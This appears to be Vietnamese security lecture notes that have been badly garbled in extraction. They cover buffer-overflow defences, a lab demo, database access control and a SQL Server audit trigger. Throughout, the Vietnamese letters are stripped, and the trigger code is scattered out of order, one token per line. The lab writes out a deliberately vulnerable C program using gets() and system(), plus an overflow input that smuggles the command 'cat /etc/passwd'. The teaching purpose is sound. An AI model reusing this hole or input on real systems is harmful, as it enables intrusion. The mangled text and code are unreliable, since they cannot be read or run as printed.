tr ti SEH Exception Handler, khng cho chng b ghi .
6, 2012
C th bo v stack hn na bng cch phn tch stack thnh hai phn, mt phn dnh cho d
liu v mt phn cho cc bc tr v ca hm. S phn chia ny c dng trong ngn ng
lp trnh Forth, tuy n khng phi mt quyt nh thit k da theo tiu ch an ton. Nhng d
sao th y cng khng phi mt gii php hon chnh i vi vn trn b m, khi cc d
liu nhy cm khng phi a ch tr v vn c th b ghi .
Bo v khng gian thc thi
Bo v khng gian thc thi l mt cch tip cn i vi vic chng trn b m. K thut ny
ngn chn vic thc thi m ti stack hay heap. Mt k tn cng c th s dng trn b m
chn mt on m ty vo b nh ca mt chng trnh, nhng vi bo v khng gian thc
thi, mi c gng chy on m s gy ra mt ngoi l (exception).
Mt s CPU h tr mt tnh nng c tn bit NX ("No eXecute" - "Khng thc thi") hoc bit
XD ("eXecute Disabled" - "ch thc thi b tt" ). Khi kt hp vi phn mm, cc tnh
nng ny c th c dng nh du cc trang d liu (chng hn cc trang cha stack v
heap) l c c nhng khng thc thi c.
Mt s h iu hnh Unix (chng hn OpenBSD, Mac OS X) c km theo tnh nng bo v
khng gian thc thi. Mt s gi phn mm ty chn bao gm:
PaX
Exec Shield
Openwall
Cc bin th mi ca Microsoft Windows cng h tr bo v khng gian thc thi, vi tn gi
Data Execution Prevention (ngn chn thc thi d liu). Cc phn mm gn km (Add-on) bao
gm: SecureStack OverflowGuard BufferShield StackDefender
Phng php bo v khng gian thc thi khng chng li c tn cng return-to-libc.
Ngu nhin ha s khng gian a ch
Ngu nhin ha s khng gian a ch (Address space layout randomization - ASLR) l
mt tnh nng an ninh my tnh c lin quan n vic sp xp v tr cc vng d liu quan
trng (thng bao gm ni cha m thc thi v v tr cc th vin, heap v stack) mt cch
ngu nhin trong khng gian a ch ca mt tin trnh.
Vic ngu nhin ha cc a ch b nh o m cc hm v bin nm ti lm cho vic khai
thc mt li trn b m tr nn kh khn hn, nhng phi l khng th c. N cn buc
k tn cng phi iu chnh khai thc cho hp vi tng h thng c th, iu ny lm tht bi
c gng ca cc con Su internet Mt phng php tng t nhng km hiu qu hn, l
k thut rebase i vi cc tin trnh v th vin trong khng gian a ch o.
Kim tra su i vi gi tin
Bin php kim tra su i vi gi tin (deep packet inspection - DPI) c th pht hin cc c
gng t xa khai thc li trn b m ngay t bin gii mng. Cc k thut ny c kh nng
chn cc gi tin c cha ch k ca mt v tn cng bit hoc cha mt chui di cc lnh
No-Operation (NOP - lnh rng khng lm g), cc chui nh vy thng c s dng khi v
tr ca ni dung quan trng (payload) ca tn cng hi c bin i.
6, 2012
Vic r cc gi tin khng phi l mt phng php hiu qu v n ch c th ngn chn cc

tn cng bit, v c nhiu cch m ha mt lnh NOP. Cc k tn cng c th s
dng m alphanumeric, metamorphic, v Shellcode t sa trnh b pht hin bi vic r gi
tin.
h. Thc hnh:
Ta khi ng h iu hnh Linux bng da CD, sau son 1 on code c ni dung
sau:
#include <stdio.h>
main() {
char *name;
char *dangerous_system_command;
name = (char *) malloc(10); dangerous_system_command = (char *) malloc(128);
printf("Address of name is %d\n", name);
printf("Address of command is %d\n", dangerous_system_command);
sprintf(dangerous_system_command, "echo %s", "Hello world!"); printf("What's
your name?");
gets(name);
system(dangerous_system_command);
}
Lu on sau y thnh file text v bin dch bng gcc
root@1[Desktop]# gcc buffer.c -o buffer
buffer.c:13:2: warning: no newline at end of file
/tmp/ccefevDP.o(.text+0x82): In function `main':
: warning: the `gets' function is dangerous and should not be used. root@1[Desktop]# ./buffer
Address of name is 134520840
Address of command is 134520856
What's your name?hao Hello world! root@1[Desktop]# ./buffer
Address of name is 134520840
Address of command is 134520856
What's your name?1234567890123456cat /etc/passwd
V.
AN TON D LIU
1. An ton c s d liu
C s d liu ca mt c quan, mt x nghip, ca mt ngnh... thng c ci t tp trung
hay phn tn trn cc my ch trn mng, l ti nguyn thng tin chung cho nhiu ngi cng s
dng. V vy cc h c s d liu cn phi c c ch kim sot, qun l v truy xut khai thc
6, 2012
thng tin sao cho d liu phi c an ton v ton vn. Thut ng an ton d liu c ngha l
cc h c s d liu cn phi c bo v chng truy nhp nhm sa i hay ph hoi mt cch
ch nh hay khng ch nh. Nh vy cc h thng c s d liu cn thit phi qun tr, bo
v tp trung, nhm bo m c tnh ton vn v an ton d liu. Ton vn d liu khc vi
an ton d liu, tuy rng chng c mi quan h mt thit vi nhau. C th s dng chung mt s
bin php thc hin. C rt nhiu mi nguy him e do n cc h thng d liu:
C s d liu c ci t tp trung hay phn tn trn cc v tr a l khc nhau,

c khai thc t cc u cui khc nhau theo ch Client/Server.
Nhiu ngi s dng truy nhp v khai thc trn cng mt c s d liu.
Rt nhiu loi d liu c ti v gi trn cc my cc b khai thc.
Truy xut vo cc h c s d liu bng nhiu ngn ng thao tc d liu khc nhau,
bng nhiu h ng dng khc nhau trn cng mt ni dung thng tin.
V vy c th xy ra
Nhng sai st ngoi mun, khi thc hin thm, sa, xo hay do li khi lp trnh.
Truy nhp tri php vi mc ch xu: sa, xo thng tin hay nh cp thng tin...
S c k thut nh li do cc thit b, li lp trnh...

D liu lu tr trong c s d liu cn phi c bo v trnh vic truy nhp tri php v
ph hoi c ch nh hay khng ch nh khi thc hin cp nht, sa i hay b sung thng tin
trong cc c s d liu. Cn phi c bin php bo v chng li vic a d liu vo mt cch
khng nht qun nh hng nghim trng n tnh ton vn d liu.
a. S vi phm an ton c s d liu.

Cc dng truy cp c ch nh bao gm :
Khng cho php c d liu.
Khng cho php sa i d liu.
Khng cho php ph hu d liu...

Vn an ton c s d liu cp n vic bo v chng li s truy cp c ch nh. Vic bo
v tuyt i cc h c s d liu khi truy nhp l khng th, nhng phi c cc bin php
mnh ngn chn hu ht truy cp tri php vo c s d liu.
b. Cc mc an ton c s d liu.
bo v c s d liu, phi thc hin cc bin php m bo an ton mt vi mc bo v
nh sau:
Mc an ton h thng c s d liu: Ty thuc vo yu cu ca ngi s dng m

ngi qun tr c s d liu cp php truy nhp mt phn vo c s d liu. Nhng ngi s
dng khc c th c php thc hin cc cu hi truy vn, nhng c th b ngn cm nh sa
i d liu.
Mc an ton h thng iu hnh: .Mc h thng kim sot ton b mc iu hnh h

thng. Vn an ton mc h thng iu hnh s c m bo bi mc an ton h thng c
s d liu. An ton trong h iu hnh c tin hnh ti nhiu cp t sp xp cc mt m
6, 2012
truy cp vo h thng cho ti s c lp cc qu trnh ang cng x l trong h thng. Tp h

thng cng cung cp mt s cp bo v. S tham kho nhng ch trong th mc l bao qut
ca nhng ch ny trong cc bi hc v h thng iu hnh.
An ton mc mng. Hu ht cc h thng c s d liu u cho php truy cp t xa

thng qua cc thit b u cui. An ton d liu mc mng l chng n cp thng tin, sao chp
thng tin v sa i ni dung thng tin trn ng truyn. Vn an ton cp mc mng t
c nhiu kt qu, ng dng ph bin trn mng Internet. Danh sch cc ch trong th mc
bao qut nn tng nguyn l ca vn an ton mng.
Nhn din ngi s dng: T nh ngha an ton d liu c th suy ra rng, h qun tr c
s d liu DBMS khng cho php ngi s dng c thc hin mt thao tc no nu khng
c php ca ngi qun tr CSDL. Ngi qun tr CSDL phi:
Xc nh cho h thng nhng thao tc m ngi s dng c php thc hin.
Cung cp mt phng tin cho ngi s dng h thng nhn bit h.
Ni chung ngi s ng u c trao nhng quyn khc nhau. Nhng quyn ny c

th bo m quyn c mt s phn ca c s d liu, quyn chn thm, xa hay sa i d liu.
Hnh thc thng dng nht nhn ra ngi s dng l mt khu, v ch c h thng v ngi s
dng bit. Mt khu cng c h thng bo v nh bo v d liu.
Bo v mc vt l: Mt m hnh bo v ng tin cy cng c kh nng b tn cng vo c

s d liu, t vic ph c mt khu n vic nh cp cc thit bi. C th chng nh cp kh
hiu qu bng cch m ha, che du d liu. Mt h thng c bo mt cao cn phi c nhng
phng thc nhn din khc tt hn mt khu, nh nhn din tng ngi s dng qua mt nhn
vin bo v, hoc kt vi cc quy nh v hnh chnh...
Kim tra truy nhp: Vi mi ngi s dng h thng s qun l mt h s c pht sinh
t vic cc chi tit v th tc xut trnh, xc minh v cc chi tit c quyn thao tc m ngi
qun tr c s d liu cp cho ngi s dng. H thng s kim tra tnh php l ca mi mt thao
tc ca ngi s dng. V d yu cu c c li nh gi hng nm ca mi mt nhn vin, ch
c th c php nu c s d liu c cha thng tin quy nh rng ngi yu cu phi l Gim
c, trng, ph phng t chc, chnh vn phng. Tt c cc i tng khc khng c trong c
s d liu khng c php truy xut. DBMS s kim tra
mi mt thao tc ca ngi s dng xem c vi phm cc rng buc an ton hay khng,
nu c s phi hu b. Mt rng buc truy nhp ni chung c lin quan n mt b phn ca c
s d liu. Do tn ti mt c quyn thch hp, gi s l chng trnh s kim tra mi mt yu
cu ca ngi s dng. Chng trnh s sp xp quyn truy nhp theo mc phc tp tng dn
sao cho t ti quyt nh cui cng nhanh nht c th.
An ninh tt c cc cp phi c duy tr nu an ninh c s d liu c bo m.

Mt s yu km vn an ton cp thp (cp vt l hay cp con ngi) cho php s ph
v cc bin php an ton nghim ngt cp cao (cp h thng c s d liu).
c. Nhng quyn hn khi s dng h c s d liu.
C th chia quyn hn truy nhp vo c s d liu.nh sau
6, 2012
c mt cch hp php: ngi s dng c php c, nhng khng c sa

i ni dung d liu.
Chn mt cch hp php: l cho php ngi s dng c chn thm d liu mi
vo c s d liu, nhng khng sa i d liu hin c.
Sa i mt cch hp php: cho php ngi s dng c php sa i ni dung

d liu, nhng khng c xo d liu.
Xo mt cch hp php: cho php ngi s dng c php xo d liu.
Cho php vic to v xo cc ch s.
Cho php vic to cc mi quan h mi.
Sa i cu trc: cho php chn thm, sa i hoc xo cc thuc tnh trong cc

quan h.
B hp php: cho php xo cc quan h.

Mt ngi s dng c th c tt c cc quyn trn, hoc ch c mt s quyn hn nht nh.
Thm vo nhng dng ca s cho php truy cp d liu chng ta c th ban cho ngi s
dng c php sa i c cu c s d liu. Cho php b v xo l khc nhau trong xo hp
php l ch cho php xo b d liu. Nu mt ngi s dng xo tt c cc b ca mt quan h,
quan h s vn tn ti nhng quan h khng cn g. Nu mt quan h b b n s khng cn
tn ti na.
minh ho bn cht ca vn , khng mt tnh tng qut, cc mnh sau ch l mt vi
nim phm vi bo v thng tin trong cc h c s d liu, ch ra cc mc truy nhp CSDL v trao
quyn cho tng lp ngi s dng:
Ngi s dng c php truy nhp khng iu kin ti ton b c s d liu, vi mi

php ton lu tr v truy vn d liu tr.
Ngi s dng khng c php truy nhp ti bt k b phn no ca c s d liu, vi

mi php ton.
Ngi s dng c th c ng mt ni dung cng vic ca h trong c s d liu,

nhng khng c php sa i, b sung n.
Ngi s dng c th c ng mt ni dung cng vic ca h trong c s d liu, v

c php sa i, b sung n.
Ngi s dng c th c v sa i thuc tnh m nhn vin, h v tn nhn vin, n

v cng tc theo nh k vo tun u ca mi thng.
Ngi s dng cm c thuc tnh nhn xt hng nm, cc thuc tnh mc lng v
ngy ln lng c c v sa i, cc thuc tnh khc ch c c. Cng vic ch c thc
hin trong khong thi gian t 9 gi n 11 gi trong cc ngy ca tun cui thng.
Ngi s dng c quyn s dng cc php ton thng k cho thuc tnh mc lng tnh
mc lng trung bnh trong tng n v. Cm sa i d liu.
d. Khung nhn mt c ch bo v
Khung nhn, bng cch nh ngha li c s d liu khi nim, khng ch to iu kin thun
li khi lp trnh trnh ng dng v lm tng tnh c lp d liu logic, m cn c s dng
nh mt c ch bo v. C hai loi khung nhn. Loi khung nhn ch c, khng cho php sa
6, 2012
i. Loi khung ny gi l khung ch c.Trong nhiu trng hp, ngi qun tr CSDL cho
php ngi s dng ny c c d liu, nhng ngi khc va c c, va c quyn
sa i, b sung...Loi khung nhn th hai cho php c v ghi ln cc thnh phn ca khung
nhn. v mi sa i cho khung nhn c th c lu trong lc khi nim. SQL xut cho
php c/ghi cc khung nhn trong mt phm vi nht nh. Vi phng php ny thit k cc
chng trnh ng dng linh hot hn loi khung ch c. Tuy nhin, khi thao tc cp nht trn cc
khung nhn c/ghi thng gy tc ng n mt s thnh phn ca c s d liu khng nm
trong khung nhn. V d trong mt h CSDL phn cp, trong khung nhn ch c kiu bn ghi gc,
khng c bn ghi ph thuc. Nu xa xut hin ca kiu bn ghi nay, ko theo phi xa cc xut
hin bn ghi ph thuc. y l mt hnh ng khng hp l, vi phm nguyn tc khng cho
ngi s dng c php xa mt i tng m h khng thy c trong khung nhn. Cng
tng t nh trong m hnh mng, nu xa mt bn ghi khi khng bit cc bn ghi khc nm
ngoi khung nhn bhng c quan h vi n. V nhiu trng hp khc tng t. V vy, tt c
cc h qun tr c s d liu .DBMS gii hn quyn cp nht cc khung nhn trong mt s trng
hp c th.
V d v hot ng ca ngn hng, mt th k cn bit tn ca tt c cc khch hng c cc
khon vay ti nhiu chi nhnh. Ngi th k ny khng c php xem nhng thng tin v
khon vay c bit m khch hng c th c. Hnh ng ca c th k b t chi khi truy nhp
trc tip ti quan h cho vay, nhng c th truy nhp bng khung nhn cust-loan bao gm cc
thng tin nh: tn ca khch hng v chi nhnh ni m khch c khon vay. Khung nhn ny
c th c nh ngha trong SQL nh sau:
CREATE VIEW cust-loan AS
(SELECT branch-name, customer-name
FROM borrower, loan
WHERE borrower.loan-number = loan.loan-number)
Gi s rng c th k a ra truy vn SQL nh sau:
SELECT *
FROM cust-loan
Nh vy ngi th k c php xem kt qu ca truy vn trn, tuy nhin qu trnh x l truy
vn ny s c thc hin trn cc quan h BORROWER and LOAN. V vy h thng phi kim
tra cc quyn hn trn truy vn ca th k trc khi bt u qu trnh x l truy vn. Vic to
mt khung nhn khng ph thuc vo cc quan h ngun. Mt ngi s dng to ra mt khung
nhn khng c nhn tt c cc c quyn trn khung nhn. V d, ngi s dng khng c
quyn cp nht trn khung nhn nu khng c quyn cp nht vo quan h bng khung nhn
c nh ngha. Nu ngi s dng to ra mt khung nhn trn nhng quyn hn khng
c php, th h thng s ph nhn yu cu to khung nhn. Trong v d khung nhn cust-loan
trn, ngi to khung nhn phi c quyn c trn c hai quan h BORROWER and LOAN.
e. Cp php cc quyn truy nhp
Mt ngi s dng c cp mt vi quyn truy nhp c s d liu v cc quyn hn ny c
th tham chiu n quyn truy nhp ca ngi s dng khc. Tuy nhin ngi qun tr c s
d liu cng cn phi c bit lu khi cc quyn ny lu thng qua gia nhiu ngi s
dng, sao cho cc quyn ny c th c thu hi ti mt thi im ty .
Hnh 1
6, 2012
th cp quyn truy nhp c s d liu
V d, gi s khi khi to, ngi qun tr c s d liu cp quyn cp nht d liu trn quan
h LOAN ca c s d liu ngn hng cho ngi s dng U1, U2 v U3 v quyn c th trong
th t thng qua quyn hn n cc quyn ca nhng ngi s dng khc. Lin thng cc quyn
t mt ngi s dng ny ti ngi s dng khc c m t bng mt th quyn hn. th
bao gm cc nt l nhng ngi s dng v cc cnh Ui Uj nu ngi s dng Ui cp
quyn cp nht trn LOAN cho ngi s dng Uj. Gc ca th l ngi qun tr c s d
liu. Trong hnh 1, ngi s dng U5 c cp quyn hn bi hai ngi s dng U1 v U2
v ngu s dng U4 c cp quyn s dng ch bi U1.
Mt ngi s dng c quyn hn truy nhp vo c s d liu theo mt s quyn no khi v
ch khi (if and only if) c mt ng i t gc trn th quyn hn, tc l lin thng t nt
ngi qun tr c s d liu ti nt ngi s dng.
Gi s ngi qun tr c s d liu quyt nh thu hi cc quyn hn ca ngi s dng U1. V
ngi s dng U4 c quyn hn dn t U1 nn quyn hn ca U4 cng s b thu hi.
Tuy nhin, v U5 c cp quyn bi U1 v U2 , v th ngi qun tr c s d liu ch thu hi
t U1 dn U5, khng thu hi quyn cp nht trn LOAN ca U2. U5 vn cn quyn cp nht
trn quan h LOAN. Nu ngi qun tr thu hi quyn cp nht ca U2 th U5 s mt
quyn hn trn quan h LOAN.
Hnh 2 C gng hu b nhng quyn hn b thu hi
6, 2012
C th xy ra nhng trng mt cp ngi s dng lu c c th c gng khng chp nhn

cc quy tc thu hi quyn c cp pht. Gi s th cp pht quyn truy nhp nh trong
hnh 2a. Ngoi cc cnh xut pht t gc DBA n U1, U2 v U3, gia U2 v U3 cn tn ti
cc ng t U2 n U3 v ngc li t U3 n U2. iu ny c ngha l ngi qun tr cp
pht quyn cho U1, U2 v U3, U2 cn thm cc quyn ca U2 v U3 cn thm cc quyn ca
U2. Nu ngi qun tr c s d liu thu hi quyn ca U3 gi li quyn hn ca U2 th
quyn truy nhp ca U3 vn cn, khng b mt v ng i t gc n U3 lin thng qua U2
nh trong hnh 2b. Nu thu hi ng thi quyn ca c hai ngi s dng U3, U3 khi cc
quyn ca U3 v U3 vn tn ti nh trong hnh 2c. Tuy nhin khi nh qun tr c s d liu
xo b cnh t U3 ti U2 v t U2 ti U3 th cc quyn s khng khng tn ti trn
ng truyn bt ngun t ngi qun tr c s d liu.
Tuy nhin, ngi qun tr c s d liu yu cu tt c cc cnh trong th cp quyn truy nhp
phi lin thng bt u t nt gc, hay bt u t ngi qun tr DBA. Nh vy cnh i t U2 v
U3 v ngc li s b xa, tc l cc quyn t U2 n U3 v ngc li phi c thu hi nh
trong hnh
6, 2012
th quyn truy nhp c s d liu
Hnh 3
f. Kim tra du vt
Nhiu ng dng v bo mt c s d liu cn duy tr mt c ch kim tra du vt. Mt s kim

tra du vt l mt bn lu tt c cc thay i khi thc hin cc php lu tr nh chn thm, xo
v sa i thng tin trong c s d liu cng vi nhng thng tin pht sinh thm trong qu trnh
thc hin. Vic kim tra du vt s gip cho vic d tm c cc nguyn nhn nhanh v chnh
xc. V d nu mt ti khon no c pht hin khng cn i, ngi qun tr c th ln
du vt ca tt c cc cp nht xy ra trong ti khon tm thy s cp nht khng ng
(c th l gian ln) ca nhng ngi thc hin vic cp nht. To ra mt s kim tra du
vt bng cch nh ngha cc chui phn ng thch hp trn cc cp nht quan h (s dng h
thng cc gi tr nh ngha nhn bit tn ngi s dng v ln truy nhp). Tuy nhin
nhiu h thng c s d liu cung cp phng php to s kim tra du vt thun tin v d s
dng.
2. Gim st thng k c s d liu
Trong mt s d n ti tng tri qua, vic theo di li nhng hnh ng xy ra trong c s d
liu l mt vic lm ht sc quan trng, gii php ca n rt nhiu, kh khn cng rt nhiu, hm
nay, ti gii thiu mt cch tip cn kh n gin m cc k hiu qu, nu bi vit ny c ch vi
bn, xin ng ngn ngi ng gp kin ca bn di bi vit ny.
Bn s theo di nhng thay i trong database nh th no, khi ngi dng xa, sa d liu. Bn
s c mt vi cch tip cn sau:
To ra mt ct tn l isDeleted: thot nhn phi cng nhn tng ny rt tt, bt c khi
no d liu trn ct b xa n s khng xa b hon ton m ch nh du m thi, cch gii quyt
ny s gii quyt c vn delete, tuy nhin n vp phi vn v rng buc d liu. Hy
tng tng ti c mt bng username ti s t
chc nh sau:
ID-UserName-Password. v ct isDeleted. V bn hiu chuyn g trong ny USERNAME phi
l duy nht trong h thng. N ch c ang k li khi mt ngi hy n i hoc cha tn ti.
6, 2012
By gi ti xa username =xyz, ngha l username =xyz l isDeleted, sau ti tip tc insert

username l xyz.
Lc ny vn ti phi rng buc ton vn trn database l nm trn ct isDeleted, Constraint
ca ti phi rng buc username v isDeleted l duy nht, tuyt, nhng ring trong chuyn ny th
l khng n, bn phi tnh ti chuyn to mt constrain cho mt ct khng tham gia vo
bussiness ca h thng, iu ny l ra nn trnh.
Mt khc, chuyn g s xy ra nu ti insert username=zyz, sau xa, ri to li, ri li xa.
Vn by gi bn phi lun kim tra trc khi insert d liu, c bao gi bn t hi, vy
constraint trong database sinh ra lm g khng??
To mt bn sao database: nu lm qua Oracle bn u bit c mt loi audit table m
oracle h tr qun l vic insert, delete , update. Khng nht thit phi Oracle, trong database
khc bn cng c th d dng ci t chc nng ny, n gin nh sau:
To mt Database log y ht database gc, mi bng thm mt ct l action cho update, delete
(insert
l
ty
chn
ca
bn)
To trigger cho tng bng, khi c thay i trn database gc, n s insert vo bng log vi s kin
tng
ng.
Cch gii quyt ny theo ti l rt tt: th nht n khng lm nng n database gc ca chng ta,
khi d liu b xa i, n s chuyn sang database log v khng lm phnh to database gc v d
hiu nh th khi truy vn database gc s cho tc tt hn v t d liu hn.
Vn ca n l kh qun l, bn phi vit chng trnh qun l cho tng bng, cc y ch nh.
6, 2012
S dng mt bng duy nht lm bng Audit.
on script to bng ny nh sau:

CREATE
TABLE
(Type
TableName
PK
FieldName
OldValue
NewValue
UpdateDate
UserName VARCHAR(128))
Audit
CHAR(1),
VARCHAR(128),
VARCHAR(1000),
VARCHAR(128),
VARCHAR(1000),
VARCHAR(1000),
datetime,
Vi cch tip cn ny, ti s gii thch cc field nh sau:

AuditID :l mt id t tng.
Type: mt action n c th l D (Delete) I (Insert) U (Update).
TableName : action xy ra trn bng no.
PrimaryKeyField : kha chnh ca dng b xa (vi bng 1 kha chnh -Theo Agile, nu
bn mong mun khc i, hy customize code)
PrimaryKeyValue: gi tr ca ct cha kha chnh.
FieldName : Ct b xy ra action.
OldValue : Gi tr c trc khi b thay i.
NewValue : Gi tr mi sau khi b thay i.
UpdateDate : Ngy gi xy ra action.
UserName : ngi dng (Ti s s dng user ca h thng, hy s dng username trn mt
table khc nh bn mun)
6, 2012
Nhn vo bng kt qu chc bn hnh dung c vn .
-Set
up
-Firstly,
we
create
-- There will only need to be one of these in a database
the
the
tables
table.
audit
IF NOT EXISTS (SELECT * FROM sysobjects WHERE id = OBJECT_ID(N'[dbo].[Audit]')

AND
OBJECTPROPERTY(id,
N'IsUserTable')
=
1)
CREATE
TABLE
Audit
(Type
CHAR(1),
TableName
VARCHAR(128),
PK
VARCHAR(1000),
FieldName
VARCHAR(128),
OldValue
VARCHAR(1000),
NewValue
VARCHAR(1000),
UpdateDate
datetime,
UserName
VARCHAR(128))
GO
-now
we
will
illustrate
-- by creating a dummy test table called TrigTest.
the
use
of
this
tool
IF EXISTS (SELECT * FROM sysobjects WHERE id = OBJECT_ID(N'[dbo].[trigtest]')

AND
OBJECTPROPERTY(id,
N'IsUserTable')
=
1)
DROP
TABLE
[dbo].[trigtest]
GO
CREATE
TABLE
trigtest
(i
INT
NOT
NULL,
j
INT
NOT
NULL,
s
VARCHAR(10),
t
VARCHAR(10))
GO
6, 2012
--note that for this system to work there must be a primary key to the table
--but then a table without a primary key isn't really a table is it?
ALTER TABLE trigtest ADD CONSTRAINT pk PRIMARY KEY (i, j)
GO
--and now create the
-table you want to monitor
CREATE
AS
TRIGGER
trigger
tr_trigtest
itself.
ON
This
trigtest
has
FOR
DECLARE
@bit
@field
@maxfield
@char
@fieldname
@TableName
@PKCols
@sql
@UpdateDate
@UserName
@Type
@PKSelect VARCHAR(1000)
--You will need to change

SELECT @TableName = 'trigtest'
-SELECT
-IF
to
be
created
INSERT,
for
UPDATE,
DELETE
INT
INT
INT
INT
VARCHAR(128)
VARCHAR(128)
VARCHAR(1000)
,
,
,
,
,
,
,
VARCHAR(2000),
VARCHAR(21)
,
VARCHAR(128)
,
CHAR(1)
,
@TableName
to
match
the
table
to
be
date
and
@UserName
=
SYSTEM_USER
@UpdateDate
=
CONVERT(VARCHAR(8),
GETDATE(),
+ ' ' + CONVERT(VARCHAR(12), GETDATE(), 114)
EXISTS
(SELECT
*
IF
EXISTS
(SELECT
SELECT
@Type
SELECT
ELSE
SELECT @Type = 'D'
-get
SELECT
*
INTO
SELECT * INTO #del FROM deleted
-Get
primary
SELECT
@PKCols
=
FROM
FROM
=
@Type
list
of
#ins
key
columns
for
COALESCE(@PKCols
+
every
user
,
112)
Action
inserted)
deleted)
'U'
ELSE
'I'
columns
inserted
FROM
full
'
audited
outer
and',
'
join
on')
+
FROM
AND
-SELECT
' i.' + c.COLUMN_NAME + ' = d.' +

INFORMATION_SCHEMA.TABLE_CONSTRAINTS pk ,
6, 2012
c.COLUMN_NAME
INFORMATION_SCHEMA.KEY_COLUMN_USAGE
c
WHERE
pk.TABLE_NAME
=
@TableName
AND
CONSTRAINT_TYPE
=
'PRIMARY
KEY'
AND
c.TABLE_NAME
=
pk.TABLE_NAME
c.CONSTRAINT_NAME = pk.CONSTRAINT_NAME
Get
primary
@PKSelect
select
for
insert
=
COALESCE(@PKSelect+'+','')
+
'''<'
+
COLUMN_NAME
+
'=''+convert(varchar(100),
coalesce(i.'
+
COLUMN_NAME
+',d.'
+
COLUMN_NAME
+
'))+''>'''
FROM
INFORMATION_SCHEMA.TABLE_CONSTRAINTS
pk
,
INFORMATION_SCHEMA.KEY_COLUMN_USAGE
c
WHERE
pk.TABLE_NAME
=
@TableName
AND
CONSTRAINT_TYPE
=
'PRIMARY
KEY'
AND
c.TABLE_NAME
=
pk.TABLE_NAME
AND c.CONSTRAINT_NAME = pk.CONSTRAINT_NAME
IF
BEGIN
key
@PKCols
RAISERROR('no
PK
IS
on
table
%s',
NULL
16,
-1,
@TableName)
RETURN
END
SELECT
=
0,
@maxfield
=
MAX(ORDINAL_POSITION)
FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = @TableName
WHILE
@field
<
@maxfield
BEGIN
SELECT
@field
=
MIN(ORDINAL_POSITION)
FROM
INFORMATION_SCHEMA.COLUMNS
WHERE
TABLE_NAME
=
@TableName
AND
ORDINAL_POSITION
>
@field
SELECT
@bit
=
(@field
1
)%
8
+
1
SELECT
@bit
=
POWER(2,@bit
1)
SELECT
@char
=
((@field
1)
/
8)
+
1
IF SUBSTRING(COLUMNS_UPDATED(),@char, 1) & @bit > 0 OR @Type IN ('I','D')
BEGIN
SELECT
@fieldname
=
COLUMN_NAME
FROM
INFORMATION_SCHEMA.COLUMNS
WHERE
TABLE_NAME
=
@TableName
AND
ORDINAL_POSITION
=
@field
SELECT
@sql
=
'
insert
Audit
(
Type,
@field
6, 2012
TableName,
PK,
FieldName,
OldValue,
NewValue,
UpdateDate,
UserName)
select
'''
+
@Type
+
''','''
+
@TableName
+
''','
+
@PKSelect
+
','''
+
@fieldname
+
''''
+
',convert(varchar(1000),d.'
+
@fieldname
+
')'
+
',convert(varchar(1000),i.'
+
@fieldname
+
')'
+
','''
+
@UpdateDate
+
''''
+
','''
+
@UserName
+
''''
+
'
from
#ins
i
full
outer
join
#del
d'
+
@PKCols
+
'
where
i.'
+
@fieldname
+
'
<>
d.'
+
@fieldname
+ ' or (i.' + @fieldname + ' is null and d.' + @fieldname + ' is not null)'
+ ' or (i.' + @fieldname + ' is not null and d.' + @fieldname + ' is null)'
EXEC
(@sql)
END
END
GO
------------------------------------------------------on m trn s lm vic hon ho, n s i vo s ca h thng v tm ra tt c nhng bng c
trong schema, sau to tng trigger theo mt template nht nh- Hy gii hn table hay column
bng cch customize li code ny.
Lu : on m ny thc hin trn Microsoft SQL Server v s dng trigger hy sa i cho ph
hp trn nhng database khc. iu ny khng th thc hin trn CSDL khng h tr trigger.
Li ch : tip cn thng qua ch mt table, iu ny mang n s thun tin v d dng khi qun
tr, nu h thng tip tc sinh si ra cc bng, khng phi l vn .
Bt li : Mt cht v vn Perfomance, vi cc Database trung bnh v nh, vic audit l bnh
thng, tuy nhin nu database ln khi s dng nhiu cu Insert v Delete s to ra nhng d liu
khng l trn tng dng (v n lu 1 field trn mt dng audit ).
Trong mi loi database d ln hay nh, nu ch s dng tracking Update action, y l mt
cch tip cn tt nht. Vi Delete, hy customize li m s dng ti thiu trng cn phi
tracking hoc c th p dng phng php logging th 2 da trn on m ny.
6, 2012
3. Phng thc an ton c s d liu

Cu trc bo mt c s
Cc doanh nghip hin nay dng nh qu ch trng vo tng thnh phn bo mt m qun i bc
tranh ton cnh: Nu nh khng c mt h thng t chc bo mt c s, bt k chnh sch bo
mt no cng u tht bi.
Ngi qun tr h thng thng hay qun l bo mt theo mun ring ca mnh, khng c hoc
ch mt t gim st t ngi qun l cao hn. iu ny lm gia tng cc cu hi:
Ai m bo rng ngi qun tr h thng theo ng cc hng dn bo mt?
Mt t chc m bo tt c qun tr vin h thng cp nht bn v li mi nht nh th no?
Mt t chc ly g m bo bn v li mi nht c kim tra chc chn chng khng tr
thnh
nguyn
nhn
gy
ra
hng
hc
cho
h
thng?
Ai l ngi kim chng bo mt cho ton b tp on hay tng cng ty?
mt
chc
bo
mt
mng
hiu
qu
rng
D c mt cu trc ph hp, bn cng vn gp phi s ln xn trong nhng vn quan trng nh

bo mt. Cc vn ln xn ny gy ra khng t bin ng ln, chng hn:
Jim ti vn phng B bin ng cp nht tt c bn v li nhng anh ta c mi lin kt khng
an ton vi Bill b bin ty. Anh ny tht bi khi thit lp cu hnh ph hp cho tng la. V
ch cn nh th l cho mt cuc tng tn cng ph hoi.
Trc nhng trng hp nh th, bn cn xem xt li ton b khi thit lp cu trc bo mt c s.
By gi, sau khi c t chc bo mt c s cho h thng, chng ta s bt u xem xt cc vn
k
thut
ca
bo
mt
c
s
d
liu.
L
hng
c
s
d
liu
(mun
mt
chin
tranh
bo
mt!)
Bo mt c s d liu v c bn c th b tn cng theo trn cc lnh vc sau:
6, 2012
Cc
dch
v
bo
mt
(Server
Security)
Cc
kt
ni
c
s
d
liu
(Database
Connection)
iu
khin
truy
cp
bng
(Table
Access
Control)
Gii
hn
truy
cp
c
s
d
liu
(Restricting
Database
Access)
Cc dch v bo mt (Server Security)
Server Security l chng trnh t gii hn quyn truy cp thc vo dch v c s d liu. y l
kha cnh quan trng nht ca bo mt, bn nn lp k hoch cn thn cho n.
tng c bn ca n l: Bn khng th truy cp vo ci m bn khng th thy. y khng
phi l mt web server v cng khng nn l mt kt ni nc danh. Khi cn cung cp thng tin cho
web ng, c s d liu ca bn khng nn t cng mt my vi web server. iu khng ch
v mc ch bo mt m cn tt cho c qu trnh thc thi. Nu c s d liu l p ng cho web
server, nn cu hnh ch cho php kt ni vi web server .
Truy cp i ch IP tin cy, gii hn dch v c s d liu ch trong cc yu cu thng tin tr li t

IP web server bit
a ch IP tin cy
